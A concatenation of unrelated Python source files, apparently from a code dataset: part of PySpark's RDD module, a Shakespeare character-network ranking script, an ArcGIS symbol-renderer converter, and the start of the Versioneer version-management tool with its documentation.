pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partitions.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return a JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
`"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available here
<http://dx.doi.org/10.1145/2452376.2452456>`_.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd())
return _load_from_socket(port, self._jrdd_deserializer)
def _prepare_for_python_RDD(sc, command):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have same life cycle as created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars]
sc._pickled_broadcast_vars.clear()
return pickled_command, broadcast_vars, sc.environment, sc._python_includes
def _wrap_function(sc, func, deserializer, serializer, profiler=None):
assert deserializer, "deserializer should not be empty"
assert serializer, "serializer should not be empty"
command = (func, profiler, deserializer, serializer)
pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec,
sc.pythonVer, broadcast_vars, sc._javaAccumulator)
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer, profiler)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func,
self.preservesPartitioning)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
py | 7dfa1b75d22b9a12a81582318e36bfdcc66ee2ae | #!/usr/bin/env python
# coding: utf-8
import re
import pandas as pd
from bs4 import BeautifulSoup
import networkx as nx
import matplotlib.pyplot as plt
# Define functions
def list_xmlfiles(directory):
"""
Return a list of filenames ending in '.txt' in DIRECTORY.
Not strictly necessary but will be useful if we try to scale.
"""
xmlfiles = []
for filename in listdir(directory):
if filename.endswith(".xml"):
xmlfiles.append(filename)
return xmlfiles
def list_textfiles(directory):
"""
Return a list of filenames ending in '.txt' in DIRECTORY.
Not strictly necessary but will be useful if we try to scale.
"""
textfiles = []
for filename in listdir(directory):
if filename.endswith(".txt"):
textfiles.append(filename)
return textfiles
def count_totals(character_list):
"""
Function to count the total number of speech acts and lines per character in each play
"""
counts = []
for character in character_list:
lines = [[line.text for line in test(['l','p'])] for test in soup.findAll(who=character)]
words = [[word.replace('\n', ' ').replace('\r', '') for word in words] for words in lines]
x = []
for item in words:
for s in item:
x.append(len(re.findall(r'\w+', s)))
speech_acts = len(lines)
total_words = sum(x)
totals = (character, speech_acts, total_words)
counts.append(totals)
df = pd.DataFrame(counts, columns=["character", "lines", "words"])
return df
def folger_count(character_list):
"""
Hacky function to deal with Folger Shakespeare editions
"""
counts = []
for character in character_list:
lines = [test('lb') for test in soup.findAll(who=character)]
words = [test('w') for test in soup.findAll(who=character)]
speech_acts = sum([sum(v != 0 for v in i) for i in lines])
total_words = sum([sum(v != 0 for v in i) for i in words])
totals = (character, speech_acts, total_words)
counts.append(totals)
df = pd.DataFrame(counts, columns=["character", "lines", "words"])
return df
def total_rankings(df):
"""
Create count rankings based on word and line lengths.
"""
df["line_rank"] = df["lines"].sort_values(ascending=False).rank(method='dense', ascending=False).astype(int)
df["word_rank"] = df["words"].sort_values(ascending=False).rank(method='dense', ascending=False).astype(int)
df["count_rank"] = ((df["line_rank"] + df["word_rank"])/2).astype(int)
return df
def metric_rankings(df):
"""
Create metrics rankings based on node metrics from .Gephi file I don't like this function very much. It's too pandas-y. But it works.
"""
df["WD_rank"] = df["weighted_degree"].sort_values(ascending=False).rank(method='dense', ascending=False).astype(int)
df["EC_rank"] = df["eigenvector"].sort_values(ascending=False).rank(method='dense', ascending=False).astype(int)
df["degree_rank"] = df["degree"].sort_values(ascending=False).rank(method='dense', ascending=False).astype(int)
df["BC_rank"] = df["betweenness"].sort_values(ascending=False).rank(method='dense', ascending=False).astype(int)
df["metrics_rank"] = ((df["WD_rank"] + df["EC_rank"] + df["degree_rank"] + df["BC_rank"])/4).astype(int)
return df
# list of filenames
indir = os.path.join("data", "text")
def main():
# Read in plays and create BeautifulSoup object
for target in indir:
print(f"Reading {target}...")
filename = os.path.join(indir, "{target}.xml")
with open(filename, 'r') as file:
raw = file.read()
soup = BeautifulSoup(raw, 'lxml')
# create list of characters based on lines
idList = []
for a in soup.findAll('sp'):
if 'who' in a.attrs.keys():
idList.append(a.attrs['who'])
# Only unique characters
unique = set(idList)
# Calculate lines and words for all characters
if target in ("1H4","2H4"):
out = folger_count(unique)
totals = out
else:
totals = count_totals(unique)
# Cleanup tables and rank measures
cleaned = pd.read_csv(f"../data/character_lists/{target}.csv", header=None)
merged = pd.merge(totals, cleaned, left_on="character", right_on=0)
merged = merged[[1, "lines", "words"]]
merged = merged.dropna()
merged = merged[~merged[1].str.contains('#')]
merged = merged.groupby(1)[['lines', 'words']].sum().reset_index()
merged.columns.values[0] = 'character'
# Calculate + save count ranks
count_ranks = total_rankings(merged)
# Calculate metric measures using networkx
edgelist_df = pd.read_csv(f"../data/edgelists/{target}.csv")
G = nx.from_pandas_edgelist(edgelist_df, "Source", "Target", ["Weight"])
nx.write_gexf(G, f"../data/graphs/{target}.gexf")
plt.figure(figsize=(14,14))
#nx.draw(G, with_labels=True, font_size=20)
#plt.draw()
# betweenness centrality
bcentrality = nx.betweenness_centrality(G, normalized=False)
between = sorted(((float(c), v) for v,c in bcentrality.items()), reverse=True)
# eigenvector centrality
ecentrality = nx.eigenvector_centrality_numpy(G)
eigen = sorted(((float(c), v) for v,c in ecentrality.items()), reverse=True)
# degree and weighted degree
degree = list(map(list, [(k,v) for k, v in nx.degree(G)]))
weighted_degree = list(map(list, [(k,v) for k, v in nx.degree(G, weight="Weight")]))
# merge centrality measures
centrality = pd.merge(pd.DataFrame(between), pd.DataFrame(eigen), on=1)
centrality.columns = ["betweenness", "character", "eigenvector"]
# merge degree measures
degrees = pd.merge(pd.DataFrame(degree), pd.DataFrame(weighted_degree), on=0)
degrees.columns = ["character", "degree", "weighted_degree"]
# merge all
metrics = pd.merge(centrality, degrees, on="character")
metrics = metrics[['character', 'betweenness', 'eigenvector', 'degree', 'weighted_degree']]
# Calculate + save ranked metric measures
metric_ranks = metric_rankings(metrics)
# Check for consistency
len(metric_ranks) == len(count_ranks)
# Combine tables
print(f"Saving data for {target}...")
count_ranks["character"] = [c.strip() for c in count_ranks["character"]]
metric_ranks["character"] = [c.strip() for c in metric_ranks["character"]]
# Save abridged ranks
ranks = pd.merge(count_ranks, metric_ranks, left_on="character", right_on="character")
ranks = ranks[["character", "line_rank", "word_rank", "WD_rank", "BC_rank"]]
ranks.to_csv(f"{target}_abridged_ranks.csv", header=True, sep="\t")
# Create a larger table that brings together all of our desired metrics into a single table.
all_ranks = pd.merge(count_ranks, metric_ranks, left_on="character", right_on="character")
all_ranks = all_ranks[["character", "lines", "words", "degree", "weighted_degree",
"eigenvector", "betweenness", "line_rank", "word_rank", "degree_rank",
"WD_rank","BC_rank", "EC_rank", "count_rank", "metrics_rank"]]
all_ranks.to_csv(f"../data/tables/full/{target}_full_ranks.csv")
# Calculate + save spearman's rho
corr = ranks.corr(method='spearman').round(2)
corr.to_csv(f"{target}.csv",header=True, sep="\t")
if __name__=="__main__":
main()
|
py | 7dfa1bbf5d6f3073a5639f2e4675541d1cb0f356 | import arcpy
from comtypes import COMError
from modules.functions import change_interface
from modules.arcGisModules import ArcGisModules
from renderer.feature.graduatedColorsRenderer import GraduatedColorsRenderer
from renderer.feature.symbols.symbolPropertiesProvider import SymbolPropertiesProvider
from renderer.feature.uniqueValueRenderer import UniqueValueRenderer
from renderer.feature.symbols.simpleSymbol import SimpleSymbol
class FeatureRenderer:
def __init__(self):
pass
@staticmethod
def create_feature_renderer(base):
"""This creates the feature-renderer-element in the DOM
:param base: is the self of the renderer object containing:
base.xml_document = xml_document
base.map_layer_element = map_layer_element
base.arcLayer = arc_layer
base.layer = layer
base.rendererType = renderer_type
"""
renderer = base.xml_document.createElement("renderer-v2")
renderer.setAttribute("forceraster", "0")
renderer.setAttribute("enableorderby", "0")
renderer.setAttribute("symbollevels", "0")
base.map_layer_element.appendChild(renderer)
symbols_element = base.xml_document.createElement("symbols")
renderer.appendChild(symbols_element)
symbols = []
arc_feature_layer = change_interface(base.arcLayer, ArcGisModules.module_carto.IFeatureLayer)
arc_geo_feature_layer = change_interface(arc_feature_layer, ArcGisModules.module_carto.IGeoFeatureLayer)
simple_renderer = arc_geo_feature_layer.Renderer
unique_value_renderer = change_interface(simple_renderer, ArcGisModules.module_carto.IUniqueValueRenderer)
# get a feature, mostly 0 , but can be higher, if using objects from a db -> than takes the id
feature = None
try:
for i in range(0, 1000):
try:
feature = arc_feature_layer.FeatureClass.GetFeature(i)
break
except COMError:
i += 1
except AttributeError:
arcpy.AddWarning("\t\tFinding a Feature to render failed.")
print "Something went wrong. Are you using a DB where the IDs start at 1001?"
pass
if base.layer.symbologyType == "OTHER" and not unique_value_renderer:
renderer.setAttribute("type", "singleSymbol")
symbols.append(simple_renderer.SymbolByFeature(feature))
elif base.layer.symbologyType == "UNIQUE_VALUES" or unique_value_renderer:
UniqueValueRenderer.create_unique_values_element(base, renderer, symbols)
elif base.layer.symbologyType == "GRADUATED_COLORS" or "GRADUATED_SYMBOLS":
GraduatedColorsRenderer.create_graduated_colors_element(base, renderer, symbols)
try:
arc_feature_layer = change_interface(base.arcLayer, ArcGisModules.module_carto.IFeatureLayer)
layer_effects = change_interface(arc_feature_layer, ArcGisModules.module_carto.ILayerEffects)
alpha = str(1 - layer_effects.Transparency * 0.01)
except AttributeError:
alpha = "1"
# create the symbol element, one for single symbol, more for graduated or unique values
for count, iSymbol in enumerate(symbols):
symbol_properties = {}
if arc_geo_feature_layer.DisplayFeatureClass.ShapeType == 4:
SymbolPropertiesProvider.get_polygon_properties(symbol_properties, iSymbol)
elif arc_geo_feature_layer.DisplayFeatureClass.ShapeType == 3:
SymbolPropertiesProvider.get_line_properties(symbol_properties, iSymbol)
elif (arc_geo_feature_layer.DisplayFeatureClass.ShapeType == 2) | \
(arc_geo_feature_layer.DisplayFeatureClass.ShapeType == 1):
SymbolPropertiesProvider.get_point_properties(symbol_properties, iSymbol)
SimpleSymbol.create_simple_symbol(base.xml_document, symbols_element, symbol_properties, count, alpha)
|
py | 7dfa1c4c3811467bfc7981bb8cd30ef96928b227 |
# Version: 0.15+dev
"""The Versioneer - like a rocketeer, but for versions.
The Versioneer
==============
* like a rocketeer, but for versions!
* https://github.com/warner/python-versioneer
* Brian Warner
* License: Public Domain
* Compatible With: python2.6, 2.7, 3.2, 3.3, 3.4, and pypy
* [![Latest Version]
(https://pypip.in/version/versioneer/badge.svg?style=flat)
](https://pypi.python.org/pypi/versioneer/)
* [![Build Status]
(https://travis-ci.org/warner/python-versioneer.png?branch=master)
](https://travis-ci.org/warner/python-versioneer)
This is a tool for managing a recorded version number in distutils-based
python projects. The goal is to remove the tedious and error-prone "update
the embedded version string" step from your release process. Making a new
release should be as easy as recording a new tag in your version-control
system, and maybe making new tarballs.
## Quick Install
* `pip install versioneer` to somewhere to your $PATH
* add a `[versioneer]` section to your setup.cfg (see below)
* run `versioneer install` in your source tree, commit the results
## Version Identifiers
Source trees come from a variety of places:
* a version-control system checkout (mostly used by developers)
* a nightly tarball, produced by build automation
* a snapshot tarball, produced by a web-based VCS browser, like github's
"tarball from tag" feature
* a release tarball, produced by "setup.py sdist", distributed through PyPI
Within each source tree, the version identifier (either a string or a number,
this tool is format-agnostic) can come from a variety of places:
* ask the VCS tool itself, e.g. "git describe" (for checkouts), which knows
about recent "tags" and an absolute revision-id
* the name of the directory into which the tarball was unpacked
* an expanded VCS keyword ($Id$, etc)
* a `_version.py` created by some earlier build step
For released software, the version identifier is closely related to a VCS
tag. Some projects use tag names that include more than just the version
string (e.g. "myproject-1.2" instead of just "1.2"), in which case the tool
needs to strip the tag prefix to extract the version identifier. For
unreleased software (between tags), the version identifier should provide
enough information to help developers recreate the same tree, while also
giving them an idea of roughly how old the tree is (after version 1.2, before
version 1.3). Many VCS systems can report a description that captures this,
for example `git describe --tags --dirty --always` reports things like
"0.7-1-g574ab98-dirty" to indicate that the checkout is one revision past the
0.7 tag, has a unique revision id of "574ab98", and is "dirty" (it has
uncommitted changes.
The version identifier is used for multiple purposes:
* to allow the module to self-identify its version: `myproject.__version__`
* to choose a name and prefix for a 'setup.py sdist' tarball
## Theory of Operation
Versioneer works by adding a special `_version.py` file into your source
tree, where your `__init__.py` can import it. This `_version.py` knows how to
dynamically ask the VCS tool for version information at import time.
`_version.py` also contains `$Revision$` markers, and the installation
process marks `_version.py` to have this marker rewritten with a tag name
during the `git archive` command. As a result, generated tarballs will
contain enough information to get the proper version.
To allow `setup.py` to compute a version too, a `versioneer.py` is added to
the top level of your source tree, next to `setup.py` and the `setup.cfg`
that configures it. This overrides several distutils/setuptools commands to
compute the version when invoked, and changes `setup.py build` and `setup.py
sdist` to replace `_version.py` with a small static file that contains just
the generated version data.
## Installation
First, decide on values for the following configuration variables:
* `VCS`: the version control system you use. Currently accepts "git".
* `style`: the style of version string to be produced. See "Styles" below for
details. Defaults to "pep440", which looks like
`TAG[+DISTANCE.gSHORTHASH[.dirty]]`.
* `versionfile_source`:
A project-relative pathname into which the generated version strings should
be written. This is usually a `_version.py` next to your project's main
`__init__.py` file, so it can be imported at runtime. If your project uses
`src/myproject/__init__.py`, this should be `src/myproject/_version.py`.
This file should be checked in to your VCS as usual: the copy created below
by `setup.py setup_versioneer` will include code that parses expanded VCS
keywords in generated tarballs. The 'build' and 'sdist' commands will
replace it with a copy that has just the calculated version string.
This must be set even if your project does not have any modules (and will
therefore never import `_version.py`), since "setup.py sdist" -based trees
still need somewhere to record the pre-calculated version strings. Anywhere
in the source tree should do. If there is a `__init__.py` next to your
`_version.py`, the `setup.py setup_versioneer` command (described below)
will append some `__version__`-setting assignments, if they aren't already
present.
* `versionfile_build`:
Like `versionfile_source`, but relative to the build directory instead of
the source directory. These will differ when your setup.py uses
'package_dir='. If you have `package_dir={'myproject': 'src/myproject'}`,
then you will probably have `versionfile_build='myproject/_version.py'` and
`versionfile_source='src/myproject/_version.py'`.
If this is set to None, then `setup.py build` will not attempt to rewrite
any `_version.py` in the built tree. If your project does not have any
libraries (e.g. if it only builds a script), then you should use
`versionfile_build = None`. To actually use the computed version string,
your `setup.py` will need to override `distutils.command.build_scripts`
with a subclass that explicitly inserts a copy of
`versioneer.get_version()` into your script file. See
`test/demoapp-script-only/setup.py` for an example.
* `tag_prefix`:
a string, like 'PROJECTNAME-', which appears at the start of all VCS tags.
If your tags look like 'myproject-1.2.0', then you should use
tag_prefix='myproject-'. If you use unprefixed tags like '1.2.0', this
should be an empty string, using either `tag_prefix=` or `tag_prefix=''`.
* `parentdir_prefix`:
a optional string, frequently the same as tag_prefix, which appears at the
start of all unpacked tarball filenames. If your tarball unpacks into
'myproject-1.2.0', this should be 'myproject-'. To disable this feature,
just omit the field from your `setup.cfg`.
This tool provides one script, named `versioneer`. That script has one mode,
"install", which writes a copy of `versioneer.py` into the current directory
and runs `versioneer.py setup` to finish the installation.
To versioneer-enable your project:
* 1: Modify your `setup.cfg`, adding a section named `[versioneer]` and
populating it with the configuration values you decided earlier (note that
the option names are not case-sensitive):
````
[versioneer]
VCS = git
style = pep440
versionfile_source = src/myproject/_version.py
versionfile_build = myproject/_version.py
tag_prefix =
parentdir_prefix = myproject-
````
* 2: Run `versioneer install`. This will do the following:
* copy `versioneer.py` into the top of your source tree
* create `_version.py` in the right place (`versionfile_source`)
* modify your `__init__.py` (if one exists next to `_version.py`) to define
`__version__` (by calling a function from `_version.py`)
* modify your `MANIFEST.in` to include both `versioneer.py` and the
generated `_version.py` in sdist tarballs
`versioneer install` will complain about any problems it finds with your
`setup.py` or `setup.cfg`. Run it multiple times until you have fixed all
the problems.
* 3: add a `import versioneer` to your setup.py, and add the following
arguments to the setup() call:
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
* 4: commit these changes to your VCS. To make sure you won't forget,
`versioneer install` will mark everything it touched for addition using
`git add`. Don't forget to add `setup.py` and `setup.cfg` too.
## Post-Installation Usage
Once established, all uses of your tree from a VCS checkout should get the
current version string. All generated tarballs should include an embedded
version string (so users who unpack them will not need a VCS tool installed).
If you distribute your project through PyPI, then the release process should
boil down to two steps:
* 1: git tag 1.0
* 2: python setup.py register sdist upload
If you distribute it through github (i.e. users use github to generate
tarballs with `git archive`), the process is:
* 1: git tag 1.0
* 2: git push; git push --tags
Versioneer will report "0+untagged.NUMCOMMITS.gHASH" until your tree has at
least one tag in its history.
## Version-String Flavors
Code which uses Versioneer can learn about its version string at runtime by
importing `_version` from your main `__init__.py` file and running the
`get_versions()` function. From the "outside" (e.g. in `setup.py`), you can
import the top-level `versioneer.py` and run `get_versions()`.
Both functions return a dictionary with different flavors of version
information:
* `['version']`: A condensed version string, rendered using the selected
style. This is the most commonly used value for the project's version
string. The default "pep440" style yields strings like `0.11`,
`0.11+2.g1076c97`, or `0.11+2.g1076c97.dirty`. See the "Styles" section
below for alternative styles.
* `['full-revisionid']`: detailed revision identifier. For Git, this is the
full SHA1 commit id, e.g. "1076c978a8d3cfc70f408fe5974aa6c092c949ac".
* `['dirty']`: a boolean, True if the tree has uncommitted changes. Note that
this is only accurate if run in a VCS checkout, otherwise it is likely to
be False or None
* `['error']`: if the version string could not be computed, this will be set
to a string describing the problem, otherwise it will be None. It may be
useful to throw an exception in setup.py if this is set, to avoid e.g.
creating tarballs with a version string of "unknown".
Some variants are more useful than others. Including `full-revisionid` in a
bug report should allow developers to reconstruct the exact code being tested
(or indicate the presence of local changes that should be shared with the
developers). `version` is suitable for display in an "about" box or a CLI
`--version` output: it can be easily compared against release notes and lists
of bugs fixed in various releases.
The installer adds the following text to your `__init__.py` to place a basic
version in `YOURPROJECT.__version__`:
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
## Styles
The setup.cfg `style=` configuration controls how the VCS information is
rendered into a version string.
The default style, "pep440", produces a PEP440-compliant string, equal to the
un-prefixed tag name for actual releases, and containing an additional "local
version" section with more detail for in-between builds. For Git, this is
TAG[+DISTANCE.gHEX[.dirty]] , using information from `git describe --tags
--dirty --always`. For example "0.11+2.g1076c97.dirty" indicates that the
tree is like the "1076c97" commit but has uncommitted changes (".dirty"), and
that this commit is two revisions ("+2") beyond the "0.11" tag. For released
software (exactly equal to a known tag), the identifier will only contain the
stripped tag, e.g. "0.11".
Other styles are available. See details.md in the Versioneer source tree for
descriptions.
## Debugging
Versioneer tries to avoid fatal errors: if something goes wrong, it will tend
to return a version of "0+unknown". To investigate the problem, run `setup.py
version`, which will run the version-lookup code in a verbose mode, and will
display the full contents of `get_versions()` (including the `error` string,
which may help identify what went wrong).
## Updating Versioneer
To upgrade your project to a new release of Versioneer, do the following:
* install the new Versioneer (`pip install -U versioneer` or equivalent)
* edit `setup.cfg`, if necessary, to include any new configuration settings
indicated by the release notes
* re-run `versioneer install` in your source tree, to replace
`SRC/_version.py`
* commit any changed files
### Upgrading to 0.15
Starting with this version, Versioneer is configured with a `[versioneer]`
section in your `setup.cfg` file. Earlier versions required the `setup.py` to
set attributes on the `versioneer` module immediately after import. The new
version will refuse to run (raising an exception during import) until you
have provided the necessary `setup.cfg` section.
In addition, the Versioneer package provides an executable named
`versioneer`, and the installation process is driven by running `versioneer
install`. In 0.14 and earlier, the executable was named
`versioneer-installer` and was run without an argument.
### Upgrading to 0.14
0.14 changes the format of the version string. 0.13 and earlier used
hyphen-separated strings like "0.11-2-g1076c97-dirty". 0.14 and beyond use a
plus-separated "local version" section strings, with dot-separated
components, like "0.11+2.g1076c97". PEP440-strict tools did not like the old
format, but should be ok with the new one.
### Upgrading from 0.11 to 0.12
Nothing special.
### Upgrading from 0.10 to 0.11
You must add a `versioneer.VCS = "git"` to your `setup.py` before re-running
`setup.py setup_versioneer`. This will enable the use of additional
version-control systems (SVN, etc) in the future.
## Future Directions
This tool is designed to make it easily extended to other version-control
systems: all VCS-specific components are in separate directories like
src/git/ . The top-level `versioneer.py` script is assembled from these
components by running make-versioneer.py . In the future, make-versioneer.py
will take a VCS name as an argument, and will construct a version of
`versioneer.py` that is specific to the given VCS. It might also take the
configuration arguments that are currently provided manually during
installation by editing setup.py . Alternatively, it might go the other
direction and include code from all supported VCS systems, reducing the
number of intermediate scripts.
## License
To make Versioneer easier to embed, all its code is dedicated to the public
domain. The `_version.py` that it creates is also in the public domain.
Specifically, both are released under the Creative Commons "Public Domain
Dedication" license (CC0-1.0), as described in
https://creativecommons.org/publicdomain/zero/1.0/ .
"""
from __future__ import print_function
try:
import configparser
except ImportError:
import ConfigParser as configparser
import errno
import json
import os
import re
import subprocess
import sys
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_root():
"""Get the project root directory.
We require that all commands are run from the project root, i.e. the
directory that contains setup.py, setup.cfg, and versioneer.py .
"""
root = os.path.realpath(os.path.abspath(os.getcwd()))
setup_py = os.path.join(root, "setup.py")
versioneer_py = os.path.join(root, "versioneer.py")
if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)):
# allow 'python path/to/setup.py COMMAND'
root = os.path.dirname(os.path.realpath(os.path.abspath(sys.argv[0])))
setup_py = os.path.join(root, "setup.py")
versioneer_py = os.path.join(root, "versioneer.py")
if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)):
err = ("Versioneer was unable to run the project root directory. "
"Versioneer requires setup.py to be executed from "
"its immediate directory (like 'python setup.py COMMAND'), "
